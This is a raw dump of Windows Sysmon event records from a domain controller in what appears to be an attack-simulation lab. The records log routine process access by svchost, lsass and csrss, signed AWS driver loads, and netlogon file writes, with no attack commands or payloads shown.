12:01:24.846{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.846{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000003162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:39.752C:\Windows\System32\drivers\xennet.sysMD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34trueAmazon Web Services, Inc.Valid 10341000x80000000000000003161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.768{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6494-6064-7C00-00000000AE01}5044C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7C00-00000000AE01}5044C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000003159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:39.612C:\Windows\System32\drivers\xeniface.sysMD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9AtrueAmazon Web Services, Inc.Valid 10341000x80000000000000003158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.752{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000003157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.596C:\Windows\System32\drivers\xenvif.sysMD5=E7C0450691E0B3D00FC15E823FFEB779,SHA256=5C0755A4E1F4FFD7B4A442CF5E3A8CF7F0C69B1CAA2B11C67596D77E166CA419,IMPHASH=C119D28B8420C26CE25D996F6D25FD88trueAmazon Web Services, Inc.Valid 10341000x80000000000000003156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=6E1503F4069613AB8064509A55137640,SHA256=FE42D2C661087DD60C360AFAA648FC33F5C1B0D70422F7EC5477A6CE52712C05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=A700430E120F8F974E4E14AD9E872E14,SHA256=6DC51FB2754214EF446248A8CDA5AAA1CCD015C621B8C58DDC68454B7CFCC95B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.721{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.721{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.705{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.705{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
